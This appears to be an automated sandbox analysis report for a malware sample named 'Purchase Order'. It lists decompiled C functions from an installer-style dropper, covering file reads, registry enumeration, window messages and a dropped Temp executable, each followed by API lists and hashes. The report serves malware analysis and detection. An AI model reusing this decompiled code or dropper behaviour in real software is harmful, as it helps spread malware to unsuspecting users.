Instruction ID: 19446832cb8519ea1938040ed984131457e28e93d0b00b9b4dc42373f0e33a15
Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction Fuzzy Hash: 382177B1500705AFCB31DF68DD08B5BBBF8AF41714B058A2EEA96B22E1C734E944CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x434f88 =  *0x434f88 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E0040649D(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E0040610E( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E004060B0( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E00406484( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
														__eax = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}

0x004026ec
0x004026ee
0x004026f1
0x004026f3
0x004026f6
0x004026fb
0x004026ff
0x00402702
0x00402705
0x00402c2a
0x00402c2d
0x0040270b
0x0040270b
0x00402712
0x00402714
0x00402714
0x0040271a
0x0040287e
0x0040287e
0x00402881
0x00402886
0x004015b6
0x0040292e
0x0040292e
0x00000000
0x00402720
0x00402721
0x0040272c
0x0040272f
0x0040273b
0x0040273f
0x004027d7
0x004027ef
0x004027ff
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00402745
0x00402745
0x00402748
0x00402749
0x0040274c
0x00402751
0x00402758
0x00402760
0x00000000
0x00402766
0x00402766
0x0040276b
0x00000000
0x00402771
0x00402771
0x00402779
0x0040277c
0x0040277f
0x0040283a
0x00402841
0x00402785
0x0040278b
0x00402797
0x00402801
0x00402801
0x00402799
0x00402799
0x0040279c
0x0040279e
0x0040279e
0x0040279e
0x004027a1
0x004027a6
0x004027a9
0x00000000
0x00000000
0x004027ab
0x004027ae
0x004027bc
0x004027c2
0x004027d0
0x00000000
0x004027d2
0x00000000
0x004027d2
0x00000000
0x004027d0
0x0040279e
0x00402804
0x00402807
0x00000000
0x00402809
0x0040280e
0x0040284f
0x00402871
0x00402878
0x0040285d
0x0040285d
0x00402860
0x00402863
0x00402866
0x00402866
0x00000000
0x00402817
0x00402817
0x0040281a
0x0040281d
0x00402823
0x00402827
0x0040282a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040282a
0x0040280e
0x00402807
0x0040277f
0x0040276b
0x00402760
0x00000000
0x0040282c
0x0040282c
0x0040282f
0x00402838
0x00000000
0x0040272f
0x0040271a
0x00402c33
0x00402c39

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 00402758
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC

Part of subcall function 0040610E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406124

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878

Strings

9, xrefs: 0040273B

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
Instruction ID: 36eba916602f65c1f8b814f2f26102ddc75cc08ed25eda7b441ea0696c55e726
Opcode Fuzzy Hash: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
Instruction Fuzzy Hash: C551E975D00219AADF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040559F Relevance: 10.6, APIs: 7, Instructions: 72
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040559F(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x433ee4;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x434fb4;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E0040657A(_t38, 0, 0x42c248, 0x42c248, _a4);
					}
					_t27 = lstrlenW(0x42c248);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x433ec8, 0x42c248);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x42c248;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x42c248[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x42c248, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

0x004055a5
0x004055af
0x004055b4
0x004055ba
0x004055c5
0x004055c8
0x004055cb
0x004055d1
0x004055d1
0x004055d7
0x004055df
0x004055e2
0x004055ff
0x00405603
0x0040560c
0x0040560c
0x00405616
0x0040561f
0x0040562b
0x00405632
0x00405636
0x00405639
0x0040564c
0x0040565a
0x0040565a
0x0040565e
0x00405660
0x00405663
0x00000000
0x00405663
0x004055e4
0x004055ec
0x004055f4
0x004055fa
0x00000000
0x004055fa
0x004055f4
0x004055e2
0x0040566f

APIs

lstrlenW.KERNEL32(0042C248,00000000,00423303,772EEA30,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
lstrlenW.KERNEL32(00403418,0042C248,00000000,00423303,772EEA30,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
lstrcatW.KERNEL32(0042C248,00403418), ref: 004055FA
SetWindowTextW.USER32(0042C248,0042C248), ref: 0040560C
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A

Part of subcall function 0040657A: lstrcatW.KERNEL32("C:\Users\user~1\AppData\Local\Temp\sphybwtjm.exe",\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
Part of subcall function 0040657A: lstrlenW.KERNEL32("C:\Users\user~1\AppData\Local\Temp\sphybwtjm.exe",00000000,0042C248,?,004055D6,0042C248,00000000), ref: 00406779

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$TextWindow
String ID:
API String ID: 1495540970-0
Opcode ID: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
Instruction ID: 138a2a903332092674924c4fce2a37a83712bc812e9b86ab44911e1df8857bb6
Opcode Fuzzy Hash: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
Instruction Fuzzy Hash: C1219071900558BACF11AFA9DD84DDFBF75EF45354F14803AF904B22A0C7794A419F68

Uniqueness

Uniqueness Score: -1.00%

Function 004067C4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E004067C4(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405E83(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405E39(L"*?|<>/\":", _t5))) == 0) {
							E00405FE8(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x004067c6
0x004067cf
0x004067e6
0x004067e6
0x004067ed
0x004067f9
0x004067f9
0x004067fc
0x004067ff
0x00406804
0x00406806
0x0040680f
0x00406813
0x00406830
0x00406838
0x00406838
0x0040683d
0x0040683f
0x00406842
0x00406847
0x00406848
0x0040684c
0x0040684c
0x0040684d
0x00406854
0x00406856
0x0040685d
0x00000000
0x00000000
0x00406865
0x0040686b
0x00000000
0x00000000
0x00000000
0x0040686b
0x00406870

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,772EFAA0,C:\Users\user~1\AppData\Local\Temp\,?,00403508,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403810), ref: 00406827
CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403810), ref: 00406836
CharNextW.USER32(?,00000000,772EFAA0,C:\Users\user~1\AppData\Local\Temp\,?,00403508,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403810), ref: 0040683B
CharPrevW.USER32(?,?,772EFAA0,C:\Users\user~1\AppData\Local\Temp\,?,00403508,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403810), ref: 0040684E

Strings

*?|<>/":, xrefs: 00406816
C:\Users\user~1\AppData\Local\Temp\, xrefs: 004067C5

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":$C:\Users\user~1\AppData\Local\Temp\
API String ID: 589700163-1439852002
Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
Instruction ID: 8e05d213a2b26a47bd0c986db1e6a85e10b5e067f284fb5e9645f7af11a9ce3c
Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
Instruction Fuzzy Hash: 7311862780161295DB313B158C44A77A2A8AF58798F56843FED86B32C1E77C8C9282AD

Uniqueness

Uniqueness Score: -1.00%

Function 00404E54 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404E54(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404e62
0x00404e6f
0x00404e75
0x00404eb3
0x00404eb3
0x00404ec2
0x00404ec9
0x00000000
0x00404ecb
0x00404e77
0x00404e86
0x00404e8e
0x00404e91
0x00404ea3
0x00404ea9
0x00404eb0
0x00000000
0x00404eb0
0x00000000

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E6F
GetMessagePos.USER32 ref: 00404E77
ScreenToClient.USER32 ref: 00404E91
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EA3
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC9

Strings

f, xrefs: 00404EA5

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction ID: 177f1d0b32132a6560496663958852c5fe6f1b23f9da62007dee57caca3d7f28
Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction Fuzzy Hash: 34014C71900219BADB00DBA4DD85BFFBBB8AB54711F10012BBA50B61C0D7B49A058BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00402F93 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x41ea18; // 0x4086a
					_t11 =  *0x42aa24;
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}

0x00402fa3
0x00402fb1
0x00402fb7
0x00402fb7
0x00402fc5
0x00402fc7
0x00402fcd
0x00402fd4
0x00402fd6
0x00402fd6
0x00402fec
0x00402ffc
0x0040300e
0x0040300e
0x00403016

APIs

SetTimer.USER32 ref: 00402FB1
MulDiv.KERNEL32(0004086A,00000064,?), ref: 00402FDC
wsprintfW.USER32 ref: 00402FEC
SetWindowTextW.USER32(?,?), ref: 00402FFC
SetDlgItemTextW.USER32 ref: 0040300E

Strings

verifying installer: %d%%, xrefs: 00402FE6

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
Instruction ID: eb17ebabde20c32bd565f0ca98bf5c3c7f8a04474e671541d9d17dad0456e96b
Opcode Fuzzy Hash: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
Instruction Fuzzy Hash: 20014B7064020DABEF209F60DE4AFEA3B79FB04345F008039FA06B51D0DBB999559F69

Uniqueness

Uniqueness Score: -1.00%

Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00402950(int __ebx) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				int _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405E83(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00406008(_t55);
				_t29 = E0040602D(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x434f14;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004034E5(_t49);
							E004034CF(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E004032B4( *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00405FE8( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E004060DF( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E004032B4( *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}

0x00402950
0x00402952
0x00402957
0x0040295c
0x0040295f
0x00402969
0x0040296d
0x0040296d
0x00402973
0x00402980
0x00402988
0x0040298b
0x00402997
0x0040299a
0x004029a0
0x004029ae
0x004029b3
0x004029b7
0x004029ba
0x004029c3
0x004029cf
0x004029d3
0x004029d6
0x004029e0
0x004029ff
0x004029ec
0x004029f4
0x004029f7
0x004029fc
0x004029fc
0x00402a06
0x00402a06
0x00402a13
0x00402a19
0x00402a1f
0x00402a1f
0x004029b7
0x00402a33
0x00402a35
0x00402a35
0x00402a3f
0x00402a40
0x00402a44
0x00402a48
0x00402a4e
0x00402a4e
0x00402a55
0x004022f1
0x00402c2d
0x00402c39

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
GlobalFree.KERNEL32 ref: 00402A06
GlobalFree.KERNEL32 ref: 00402A19
CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
Instruction ID: 8fc1a79e9ee36ebd610a2d663d7387b5f1fea8f48d7bc9e01940cd119f3fb53c
Opcode Fuzzy Hash: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
Instruction Fuzzy Hash: 5831C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E0CB794C429BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004063AA(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
